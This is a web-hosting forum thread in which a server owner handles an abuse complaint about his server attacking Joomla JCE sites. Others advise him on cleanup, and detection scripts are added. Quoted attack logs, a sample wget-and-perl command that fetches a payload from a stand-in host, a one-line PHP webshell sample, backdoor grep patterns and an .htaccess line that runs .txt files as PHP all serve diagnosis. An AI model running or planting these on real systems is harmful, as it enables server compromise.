Page 1 of 2 (results 1 to 25 of 26)
  1. #1

    Need Help Urgently

    I have received a message from my server provider saying that, according to them, they have received an abuse complaint related to a possible security violation.

    The complaint is below:

    Hi,

    We have had hack attempts on our website from your network, from IP address XXXXXXXXXXXXXXX

    We believe this server is compromised by hackers in Turkey, and is part of a botnet attack, possibly using eggdrop bot/psybnc, controlled by UDP via port 80.

    Please check this server for malware or if this is a user account, please inform them that this kind of behaviour is unacceptable.

    The criminal controlling the botnet usually targets CPanel/WHM, WordPress Akismet, Joomla Open Flash Chart library (ofc_upload_image.php) and ccmail installations, so please check any other servers running these.


    They also told me about the logs.


    Extract from Logs follows:

    XXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 -

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 -

    XXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813

    XXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813 "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813 "-" "BOT/0.1 (BOT for JCE)"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "GET /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ//images/stories/localhost.php?rf HTTP/1.1" 200 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:51 +1100] "GET /hacker_php.txt&sa=U&ei=FiK0Uo3wKYmo4ASHtYCgCQ&ved=0CNwBEBYwOg&usg=AFQjCNG_6FCfORSAtHGZcEWx3SOqZGD6LQ//images/stories/localhost.php?rf HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:52 +1100] "GET //images/stories/localhost.php?rf HTTP/1.1" 200 16813

    XXXXXXXXXXXXX - - [20/Dec/2013:21:52:52 +1100] "GET //images/stories/localhost.php?rf HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

    Please help me: how can I get rid of this problem?
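As an added example (not from the original post or the complainant), a small shell script that triages Apache combined-format log lines for the JCE imgmanager attack chain seen above: the plugin probe and upload POSTs, the "BOT for JCE" user agent, and the follow-up GET of a PHP file under images/stories, which is where that plugin writes uploads. The log lines inside it are constructed with RFC 5737 documentation addresses, and the function names are my own. Read on the complaining server's log, the flagged address is the attacking host (here, the poster's server); read on your own server's log, a 200 on that GET means the upload step succeeded and the file should be pulled for inspection.

```shell
#!/bin/sh
# Added example, not part of the original post: triage Apache combined-format
# access log lines for the JCE imgmanager attack pattern from the complaint.
# The sample lines are constructed; the IPs are RFC 5737 documentation
# addresses, not the addresses from the complaint.

SAMPLE_LOG='198.51.100.7 - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
198.51.100.7 - - [20/Dec/2013:21:52:51 +1100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 16813 "-" "BOT/0.1 (BOT for JCE)"
198.51.100.7 - - [20/Dec/2013:21:52:52 +1100] "GET //images/stories/localhost.php?rf HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.0.113.9 - - [20/Dec/2013:21:53:10 +1100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Dec/2013:21:53:11 +1100] "GET /images/stories/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# Lines that belong to the JCE imgmanager attack chain: the plugin probe /
# upload POSTs (with or without the "BOT for JCE" agent) and any request for
# a PHP file under images/stories, the directory the plugin writes uploads to.
jce_lines() {
    grep -E 'option=com_jce.*plugin=imgmanager|BOT for JCE|/images/stories/[^ "]*\.php'
}

# "ip count" for each source address present in the attack lines.
jce_suspects() {
    jce_lines | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' | sort
}

# Uploads that were actually served: a GET of a PHP file under images/stories
# answered with 200. Combined-format fields: $1 client, $7 request path,
# $9 status code.
jce_webshell_served() {
    awk '$7 ~ /\/images\/stories\/[^\/]*\.php/ && $9 == 200 { print $1, $7 }'
}

# First and last timestamp of the attack lines; use the window when hunting
# for files created or modified during the attack.
jce_window() {
    jce_lines | awk '{ t = substr($4, 2) } NR == 1 { first = t } { last = t }
                     END { if (NR) print first, last }'
}

# Stand-alone demo on the constructed sample: ./jce_triage.sh demo
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | jce_suspects
    printf '%s\n' "$SAMPLE_LOG" | jce_webshell_served
    printf '%s\n' "$SAMPLE_LOG" | jce_window
fi
```

Feed it a real log with `jce_suspects < /var/log/httpd/access_log`; on a cPanel box the per-domain Apache logs live under /usr/local/apache/domlogs. The span printed by `jce_window` is the time range to use with `find -newermt` (GNU find) when looking for files written during the attack.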

  2. #2
    Join Date: Apr 2003 | Location: London, UK | Posts: 4,721
    Quote Originally Posted by mudaber View Post
    Please help me how can I get rid of this problem.
    Firstly, is it a client account / server or your own personal machine? If the latter then you need somebody to provide a security audit. If it's a client then you need to engage with them accordingly.

  3. #3
    Yes, it's my personal machine. Can you tell me how I can identify the affected part of my server through SSH?

  4. #4
    Join Date: Apr 2003 | Location: London, UK | Posts: 4,721
    It's likely a compromised script on your server, but it could be so many things that if you don't know where to start you need to hire somebody that can identify the exact issue and secure it for you.

    In the meantime you should at least respond to your provider and let them know you are looking at it. They may even offer a management service that can assist in finding the issue?

    Nobody can give you a step-by-step fix from what you've posted. People could suggest a hundred different things without one solving the problem.

  5. #5
    Join Date: Apr 2002 | Location: Seaside, CA | Posts: 213
    Maybe start by CHMOD /hacker_php.txt to 000?
    Did you take a look at what's in there?

  6. #6
    I am really thankful to both of you, Loon and codeNSupport. I want to tell you something more about my affected IP, which the complainant mentioned in his mail. I am using this IP as my WHM/cPanel primary IP. I am also using this IP with my website. This website has WordPress. I also have 3 other IPs which I am using with my other websites. CodeNSupport, you told me about CHMOD /hacker_php.txt to 000; kindly tell me how I can check it in my WordPress or FTP.

  7. #7
    Join Date: Nov 2003 | Location: Texas, United States | Posts: 115
    Based on the URL, the "hacker_php.txt" file would reside in your web site's root directory. If you use a GUI FTP application, log into your server with it, navigate to your web root directory, left-click the file, and there may be an option to change permissions.

    As you are running WordPress, have you been keeping it up to date (along with any plugins)?
    Tim Benoit

  8. #8
    Join Date: Apr 2002 | Location: Seaside, CA | Posts: 213
    I may have misunderstood.

    Is this your site being compromised?

    Or is your IP compromising another site?

    Are all the XXXXXXXXXXX redacted IPs you list the same IP or are some different?
    Last edited by EStarr; 01-06-2014 at 06:51 PM. Reason: IP Q

  9. #9
    Join Date: Jan 2005 | Location: Scotland, UK | Posts: 2,681
    That looks like a log from another server showing your system's IP attempting to access files located on that other server, so I don't think looking for hacker_php.txt etc. is going to help. You should be looking for backdoors on your system that are scanning other remote systems.

    If it is the log from your system, they didn't get any ~200 OK responses.

    What you should do is review your accounts for outdated applications and get them updated, maybe look for recently modified files too.
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implementation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  10. #10
    CodeNSupport, it is the same IP, which I have replaced with XXXXXXXXXX. Second, I have updated my WordPress application right now. But there is a confusion about what tbenoit prescribed: should I change CHMOD /hacker_php.txt in the public_html directory, or in some other file located outside of public_html? Please guide me. I have also attached an image of my FTP client, which will help show what I mean.
    [Attached: 1.jpg, 2.jpg]

  11. #11
    log into your server and then:

    ps faux

    look for suspicious processes. usually something along these lines:

    apache 3207 0.0 0.0 2456 1132 ? S 10:32 0:00 /bin/bash ./asd
    apache 21554 0.0 0.0 2452 1080 ? S 12:13 0:00 \_ /bin/bash ./su 192.168
    apache 21562 95.0 0.0 1676 492 ? R 12:13 5:41 \_ ./ps 192.168.1.1
    apache 20343 0.0 0.0 2452 1032 ? S 12:04 0:00 sh -c cd /tmp;wget http://badwebsite.hacker.fubar:35489/q.pdf;perl q.pdf;rm -rf q.pdf
    apache 20345 0.0 0.0 5236 1604 ? S 12:04 0:00 \_ wget http://badwebsite.hacker.fubar:35489/q.pdf
    apache 20355 0.0 0.0 2452 1032 ? S 12:04 0:00 sh -c cd /tmp;wget http://badwebsite.hacker.fuba:35489/q.pdf;perl q.pdf;rm -rf q.pdf
    apache 20356 0.0 0.0 5236 1604 ? S 12:04 0:00 \_ wget http://badwebsite.hacker.fubar:35489/q.pdf



    do an lsof -np on the process id, you'll likely find the directory where the malicious files are residing:


    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    asd 3207 apache cwd DIR 0,107 4096 67668450 /var/tmp/.ssh_auth/.5

    or it may point to an actual home directory, which can make tracking it even easier. poke around in the directories and match up timestamps with logs. check the time the attacks took place within your access logs to see if any of the traffic leads to sketchy material. if you come across the issue being in a home directory, try using grep -r 'eval(base64_decode' and grep -r '{eval(stripslashes'; it'll aid in finding the files associated with the attack.


    now everyone is right in saying it could really be a whole slew of things; however, in my experience this is the typical issue. however, the process itself could easily be masked as something like clamd or even sshd, so just keep an eye out and poke around a bit. if you can't find it, perhaps hire some outside assistance. this is typical botnet activity and can sometimes be rather unpleasant to deal with if you aren't experienced.


    edit: this is me assuming you're using Linux for the webserver (you mention a personal machine, however you're FTPing into your server)
    Last edited by grapenut; 01-07-2014 at 11:25 AM.
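To make grapenut's procedure repeatable, here is an added shell script (not grapenut's code and not part of the original post) that applies the same three checks: flag suspicious `ps` entries, show where a running PID lives (the /proc equivalent of `lsof -np`), and grep the web tree for the two obfuscation patterns named above plus a few common relatives. The `ps` lines and the web root it scans are constructed so it runs offline; `badwebsite.hacker.fubar` comes from the post, everything else (file names, function names, the `.cache.php` and `localhost.php` samples) is made up for the example.

```shell
#!/bin/sh
# Added example, not grapenut's code: automates the checks from the post above.
# The ps sample and the web root are constructed so the script runs offline.

SAMPLE_PS='apache 3207 0.0 0.0 2456 1132 ? S 10:32 0:00 /bin/bash ./asd
apache 21562 95.0 0.0 1676 492 ? R 12:13 5:41 ./ps 192.168.1.1
apache 20343 0.0 0.0 2452 1032 ? S 12:04 0:00 sh -c cd /tmp;wget http://badwebsite.hacker.fubar:35489/q.pdf;perl q.pdf;rm -rf q.pdf
root 32051 0.0 0.0 66604 596 ? Ss 2013 1:20 /usr/sbin/sshd
hussain 25322 0.9 0.0 56116 7068 ? S 2013 309:13 /usr/sbin/httpd'

# Read `ps aux` output on stdin and print "pid command" for processes that run
# something from a relative path ("./asd"), chain a download into an
# interpreter, change into a temp directory, or belong to the web-server user
# yet are not the web server binary. The command starts at field 11.
suspicious_procs() {
    awk '
    NR == 1 && $1 == "USER" { next }          # skip the ps header if present
    {
        cmd = $11
        for (i = 12; i <= NF; i++) cmd = cmd " " $i
        web = ($1 == "apache" || $1 == "nobody" || $1 == "www-data")
        if (cmd ~ /(^| )\.\// || cmd ~ /;(wget|curl) / ||
            cmd ~ /cd \/(var\/)?tmp/ || (web && cmd !~ /httpd/))
            print $2, cmd
    }'
}

# Where a live PID runs from and what binary it really is (Linux /proc, root
# needed for other users processes). An exe ending in "(deleted)" means the
# binary was removed after launch, the classic dropped-and-wiped bot.
proc_origin() {
    printf 'cwd: %s\nexe: %s\n' "$(readlink "/proc/$1/cwd")" "$(readlink "/proc/$1/exe")"
}

# Constructed web root: one clean file and two backdoor-style files.
make_sample_webroot() {
    mkdir -p "$1/wp-content/uploads" "$1/images/stories"
    printf '<?php\necho "hello";\n' > "$1/index.php"
    printf '<?php\neval(base64_decode("aGVsbG8="));\n' > "$1/wp-content/uploads/.cache.php"
    printf '<?php\n@eval(gzinflate(base64_decode($_POST["x"])));\n' > "$1/images/stories/localhost.php"
}

# The two grep patterns from the post plus common relatives: inflate/rot13 then
# eval, preg_replace with the /e modifier, and exec functions fed request input.
find_backdoors() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.txt' \) -exec grep -lE \
        'eval\(base64_decode|[{]eval\(stripslashes|gzinflate\(|str_rot13\(|preg_replace\(.*/e|(assert|system|passthru|shell_exec|exec)\(\$_(GET|POST|REQUEST)' {} + \
    | sort
}

# PHP files changed in the last N days (default 7); compare with the attack
# window from the access log.
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-${2:-7}"
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_PS" | suspicious_procs
    d="$(mktemp -d)"; make_sample_webroot "$d"; find_backdoors "$d"; rm -rf "$d"
fi
```

`suspicious_procs` expects `ps aux` output (the `\_` tree prefix of `ps faux` lands in the command field and is harmless); `proc_origin 3207` replaces the `lsof -np 3207` step on Linux. Treat a hit from `find_backdoors` as a lead, not a verdict: some legitimate plugins also ship base64-wrapped code, so open the file and read what it decodes to.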

  12. #12
    Thanks grapenut for replying to me in detail. I have logged in to my server with the root ID and given the ps faux command according to your instructions, and found the processes below. Are these OK? If these processes are wrong, then tell me what I should do in some more detail. I know well how to use PuTTY through SSH commands, but I am not aware of malware searching and removal commands; can you tell me in an easy way, step by step? I will always be thankful to you.

  13. #13
    [Attached: screen.JPG]

  14. #14
    Join Date: Nov 2003 | Location: Texas, United States | Posts: 115
    Your public_html directory (i.e. your document root) does not appear to have the hacker_php.txt file based on your FTP screenshots (Scott.Mc mentioned this may be the case in his post).

    As to your processes, you only provided a screenshot, which doesn't capture all of the processes. You will need to copy/paste them all so they can all be reviewed.

    You probably should engage a company to come in and poke around your server. As it seems your server is running something that reaches out to other servers your best bet may end up being to have the server rebuilt and secured, then reinstall any apps (latest versions) and secure them and then have your server administered regularly. That is possibly the best way to be sure you are rid of whatever is causing this.
    Tim Benoit

  15. #15
    tbenoit, thanks again for the reply. Can you tell me the SSH command for seeing all the processes?

  16. #16
    You can see all processes with ps aux, or for only a specific user, top -u username, or after you su - useraccount, you can do ps x (for only that user).
    BeltHosting.com Staff. Shared Web Hosting | Reseller Web Hosting | IRCD Hosting | psyBNC/sBNC/eggdrop/znc Hosting
    xShellz Linux Shell & IRCD Hosting.
    24/7 Live & Ticket Support

  17. #17
    I have attached screenshots of the process list. Now what do you say about those processes? Please guide me if these are correct.
    [Attached: 1.JPG, 2.JPG]

  18. #18
    Hi,

    It looks like you have compromised accounts or scripts which are generating attacks from your server. Before your server provider completely blocks access, I suggest you hire a server management company immediately. It seems you do not have enough experience in managing the server, so the best option is to hire someone immediately before you run into more trouble.
    || Web Hosting Blog - Web Hosting security & latest web hosting industry Announcements
    || Web Hosting Discussion - A Web Hosting community

  19. #19
    Join Date: Oct 2008 | Location: Chicago, IL | Posts: 222
    You have updated WordPress; what about the plugins? Have you compared all the files in your wp-admin and wp-includes folders with the files from a fresh WordPress install? If not, you should.

    Also, check the plugins against new downloads of those same plugins. Yes it takes time, but if you want to find out where the infection is, you'll have to run that.

    Also, check the files in the themes folders. See if any of them are different than known, good backups (that hopefully you have).

    From the log files you provided, that hacker_php.txt isn't on your site, but the infectious code on your site thinks it's on the site it's attacking. You might also look for a folder with an .htaccess file that allows php code to run from a file with a .txt extension.

    It would be something like:

    AddType application/x-httpd-php .txt

    or

    AddHandler application/x-httpd-php .txt

  20. #20
    Mudaber, I told you to use ps aux, not ps aus.

  21. #21
    StefanHost, here are my processes after giving the ps aux command:

    hussain 24737 0.0 0.0 59840 10500 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24739 0.0 0.0 59840 10516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24792 0.0 0.0 59684 10984 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24850 0.0 0.0 59684 10984 ? S 2013 0:00 /usr/sbin/httpd
    hussain 24905 0.0 0.0 71520 12896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25019 0.0 0.0 57520 8084 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25119 0.0 0.0 57540 6512 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25120 0.1 0.0 56116 6336 ? S 2013 48:06 /usr/sbin/httpd
    hussain 25140 0.0 0.0 60492 4516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25142 0.0 0.0 60492 4484 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25144 0.0 0.0 60492 4496 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25173 0.0 0.0 57540 6528 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25222 0.0 0.0 57540 6520 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25239 0.0 0.0 59840 10524 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25241 0.0 0.0 59840 10504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25243 0.0 0.0 59840 10500 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25264 0.0 0.0 60492 4492 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25266 0.0 0.0 60492 4512 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25268 0.0 0.0 60492 4492 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25303 0.0 0.0 70740 12232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25322 0.9 0.0 56116 7068 ? S 2013 309:13 /usr/sbin/httpd
    hussain 25428 0.0 0.0 60616 11932 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25431 0.0 0.0 60616 11928 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25433 0.0 0.0 60616 11932 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25659 0.0 0.0 57904 9292 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25664 0.0 0.0 71348 12836 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25732 0.0 0.0 57904 9284 ? S 2013 0:00 /usr/sbin/httpd
    hussain 25795 0.0 0.0 57904 9292 ? S 2013 0:00 /usr/sbin/httpd
    root 25943 0.0 0.0 130772 4252 ? S Jan06 0:00 /etc/authlib/au
    hussain 26070 0.0 0.0 70788 12256 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26353 0.0 0.0 57728 8504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26437 0.0 0.0 71616 13008 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26454 0.0 0.0 57212 8020 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26474 0.0 0.0 70992 12428 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26528 0.1 0.0 70044 11104 ? S 2013 43:23 /usr/sbin/httpd
    hussain 26541 0.0 0.0 56880 8224 ? S 2013 0:00 /usr/sbin/httpd
    hussain 26699 0.1 0.0 56116 7020 ? S 2013 46:24 /usr/sbin/httpd
    hussain 26702 0.8 0.0 70044 11592 ? S 2013 261:05 /usr/sbin/httpd
    hussain 26812 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    nobody 26829 0.0 0.0 76728 4784 ? S 13:39 0:00 /usr/local/apac
    hussain 26875 0.8 0.0 56116 7544 ? S 2013 276:51 /usr/sbin/httpd
    hussain 27052 0.0 0.0 57728 8504 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27090 0.0 0.0 56116 6988 ? S 2013 27:34 /usr/sbin/httpd
    hussain 27265 0.9 0.0 56116 7440 ? S 2013 307:41 /usr/sbin/httpd
    hussain 27272 0.0 0.0 57692 9020 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27475 0.1 0.0 70044 11092 ? S 2013 41:05 /usr/sbin/httpd
    hussain 27504 0.0 0.0 57124 8536 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27526 0.1 0.0 70044 11104 ? S 2013 45:49 /usr/sbin/httpd
    hussain 27560 0.0 0.0 57124 8536 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27630 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27654 0.8 0.0 70044 11592 ? S 2013 243:27 /usr/sbin/httpd
    hussain 27670 0.0 0.0 56116 7012 ? S 2013 12:37 /usr/sbin/httpd
    hussain 27703 0.9 0.0 70044 11616 ? S 2013 281:35 /usr/sbin/httpd
    hussain 27735 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27771 0.1 0.0 56116 7020 ? S 2013 46:03 /usr/sbin/httpd
    hussain 27839 0.0 0.0 57524 8208 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27840 0.0 0.0 57728 8496 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27845 0.0 0.1 75968 27396 ? S 2013 1:05 /usr/sbin/httpd
    hussain 27849 0.8 0.0 56116 7540 ? S 2013 180:08 /usr/sbin/httpd
    hussain 27943 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 27951 0.8 0.0 56116 7540 ? S 2013 276:53 /usr/sbin/httpd
    hussain 27975 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28050 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28069 0.0 0.0 57644 8956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28147 0.0 0.0 57644 8956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28152 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28225 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28233 0.0 0.0 56724 7952 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28250 0.0 0.0 71412 12644 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28268 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28281 0.0 0.0 57300 8676 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28291 0.0 0.0 70332 11800 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28390 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28428 0.0 0.0 56768 7896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28434 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28436 0.0 0.0 57300 8676 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28441 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28454 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28456 0.0 0.0 71452 12856 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28484 0.0 0.0 57236 8568 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28497 0.0 0.0 57524 8212 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28499 0.0 0.0 70332 11804 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28519 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28528 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28534 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28537 0.0 0.0 57044 7700 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28543 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28551 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28554 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28587 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28617 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28679 0.0 0.0 56724 7956 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28720 0.0 0.0 57524 8204 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28745 0.0 0.0 57044 7672 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28818 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28832 0.0 0.0 57524 8208 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28841 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28916 0.0 0.0 71616 13000 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28920 0.0 0.0 56724 7952 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28925 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28940 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28941 0.0 0.0 57524 8236 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28945 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28951 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 28960 0.0 0.0 56724 7948 ? S 2013 0:00 /usr/sbin/httpd
    nobody 29028 0.0 0.0 76728 4804 ? S 13:40 0:00 /usr/local/apac
    hussain 29045 0.0 0.0 57524 8232 ? S 2013 0:00 /usr/sbin/httpd
    root 29084 0.0 0.0 130772 4292 ? S Jan05 0:00 /etc/authlib/au
    nobody 29106 0.0 0.0 76728 4828 ? S 13:40 0:00 /usr/local/apac
    hussain 29127 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29144 0.0 0.0 71464 12592 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29148 0.1 0.0 56116 7008 ? S 2013 41:36 /usr/sbin/httpd
    hussain 29206 0.0 0.0 70332 11808 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29216 0.0 0.0 70992 12432 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29322 0.8 0.0 56116 7516 ? S 2013 241:23 /usr/sbin/httpd
    hussain 29463 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29466 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29472 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29539 0.0 0.0 71244 12412 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29553 0.0 0.0 57212 8036 ? S 2013 0:00 /usr/sbin/httpd
    root 29759 0.0 0.0 10648 544 ? S<s 2013 0:00 /sbin/udevd -d
    hussain 29775 0.0 0.0 56768 7896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29778 0.0 0.0 56768 7904 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29784 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29817 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29830 0.0 0.0 57520 8136 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29849 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 29945 0.0 0.0 57524 8240 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30001 0.0 0.0 56768 7900 ? S 2013 0:00 /usr/sbin/httpd
